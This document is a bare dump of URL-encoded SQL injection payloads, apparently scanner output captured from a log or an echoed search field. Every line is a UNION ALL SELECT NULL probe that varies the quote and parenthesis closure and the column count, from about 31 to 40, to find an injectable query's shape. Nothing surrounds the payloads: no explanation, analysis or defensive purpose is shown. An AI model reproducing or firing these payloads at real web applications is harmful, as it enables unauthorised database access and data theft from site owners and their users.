1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 